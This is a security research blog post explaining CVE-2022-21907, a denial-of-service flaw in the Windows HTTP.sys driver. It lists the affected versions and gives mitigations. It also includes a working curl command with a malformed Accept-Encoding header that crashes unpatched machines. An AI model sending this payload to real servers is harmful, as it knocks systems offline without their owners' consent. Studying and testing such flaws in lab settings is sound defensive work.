Security research

How to exploit the HTTP.sys Remote Code Execution vulnerability (CVE-2022-21907)

Publisher
Pentest-Tools.com
Updated at
Article tags

Pattern recognition is what hundreds of security specialists in our community voted as the skill to cultivate for a rewarding infosec career. While we have some innate pattern recognition abilities, developing them is essential – and that’s a matter of practice. 

Working in offensive security gives you plenty of opportunities to do this, with new vulnerabilities ripe for close examination. So let’s go ahead and do just that while discovering how this CVE carries echoes from another vulnerability from a while back. 

What is CVE-2022-21907?

CVE-2022-21907 (CVSSv3 9.8) is a critical vulnerability which affects the HTTP Protocol Stack (HTTP.sys).

Wait, what is HTTP.sys? Well, HTTP.sys is a kernel device driver found in modern Microsoft Windows operating systems which is responsible for handling HTTP traffic in services like Microsoft IIS.

Most of the research done into this vulnerability has revealed that you can trigger the infamous Blue Screen of Death crash in the underlying machine that runs an unpatched HTTP.sys driver. 

This sounds a bit familiar, right? Yes, it does! Some of you might have already thought of CVE-2021-31166 which is pretty similar to our current vulnerability. 

For those of you who don’t remember this CVE from back on May 21, 2021, it is another vulnerability in the HTTP Protocol Stack caused by a use-after-free type of bug which attackers can also “weaponized” – with the proper exploit – and cause the Blue Screen of Death yet again.

In terms of how widespread the vulnerability is, Microsoft points out this CVE can be found in various versions of Windows 10, Windows 11, Windows Server 2019, and Windows Server 2022. 

While Windows 10 1809 and Windows Server 2019 are not vulnerable by default, they can still be compromised if HTTP Trailer Support is enabled via the EnableTrailerSupport registry value which you can find under HKEYLOCALMACHINE\System\CurrentControlSet\Services\HTTP\Parameters.

The disruption this vulnerability can cause is rather severe and, although systems might restart and function properly after one attack, subsequent attacks could lead to complete denial of service.

How does CVE-2022-21907 work?

According to the more in-depth analysis performed by the researchers at Trellix, what makes the CVE-2022-21907 tick is an uninitialized memory vulnerability in the following functions:  UlpAlllocateFactTracker & UlAllocateFastTrackerToLookaside. 

By not zeroing the memory allocated within UlpAlllocateFactTracker and UlAllocateFastTrackerToLookaside, attackers can inject malicious payloads into the uninitialized areas.


Windows versions with a vulnerable HTTP.sys driver

Release

Vulnerable by default

Windows 10 20H2

Windows 10 21H1

Windows 10 21H2

Windows 11

Windows Server 20H2

Windows Server 2022

Windows 10 1809

Requires enabled HTTP Trailer Support

Windows Server 2019

Requires enabled HTTP Trailer Support

Business impact of CVE-2022-21907

As of right now, no exploits have been released that can be used to gain remote access to a vulnerable target.  However, there are some publicly available PoC exploits that can cause denial of service. 

Business owners and organizations that don’t want to lose access to any critical systems and sensitive data are required to keep their devices updated in order to eliminate the risk of a DoS caused by a threat actor.

How to manually trigger BSoD with CVE-2022-21907

If you’d like to see this CVE in action and you have a spare Windows Virtual Machine lying around, then you could perform the following request with curl on the VM’s IP address.

curl 192.168.0.164:80 -sH "Accept-encoding: 354429474810858105277502,753225473272192695969091599085146218998458873428858279498120&68&**82302744837636557755**9,2120453047251623940869443373783750655190662992171177571578371548748405709,03504570598828001819032433815484769110241925758402724193417475718971298,895259892660286842061499776,****************************267816, *, ,"

I want to credit nu11secur1ty for releasing first a Python proof of concept of the exploit which helped kick-start our research for this CVE.

Here is the command in action:

To replicate the events in the screenshot, you’ll only need a vulnerable Windows release and a service using HTTP.sys, such as Microsoft IIS. 

The table above shall help you determine whether your available machine is vulnerable or not, or guide you in choosing a vulnerable release for your further research.

How to mitigate CVE-2022-21907

With these requirements in check, you are now ready to hack ‘n’ roll. Pun intended 😁.

If you have a machine running either Windows Server 2019 or Windows 10 version 1809, there is a quick mitigation available. 

As mentioned above, these two versions are vulnerable if the HTTP Trailer Support is enabled, so to mitigate the attack, one could simply modify the EnableTrailerSupport registry.

To remove the vulnerability, users should install the security updates that Microsoft released which patch the issue.

Have a process for your “madness”

Having a method to your curiosity will always serve you well. That’s why I encourage you to “steal” the approach we provide in the security testing and ethical exploitation guides we publish. There’s no need to start from scratch and you can make progress faster if you iterate and improve on a given framework. Tried and tested by yours truly! 

See you soon with more guides like this one! 

PS: We also update them from time to time, so bookmark this one or any others you want to return to later. 

Get fresh security research

In your inbox. (No fluff. Actionable stuff only.)

I can see your vulns image

Related articles

Suggested articles

Discover our ethical hacking toolkit and all the free tools you can use!

Create free account

Footer

© 2013-2024 Pentest-Tools.com

Join over 45,000 security specialists to discuss career challenges, get pentesting guides and tips, and learn from your peers. Follow us on LinkedIn!

Expert pentesters share their best tips on our Youtube channel. Subscribe to get practical penetration testing tutorials and demos to build your own PoCs!

G2 award badge

Pentest-Tools.com recognized as a Leader in G2’s Spring 2023 Grid® Report for Penetration Testing Software.

Discover why security and IT pros worldwide use the platform to streamline their penetration and security testing workflow.

OWASP logo

Pentest-Tools.com is a Corporate Member of OWASP (The Open Web Application Security Project). We share their mission to use, strengthen, and advocate for secure coding standards into every piece of software we develop.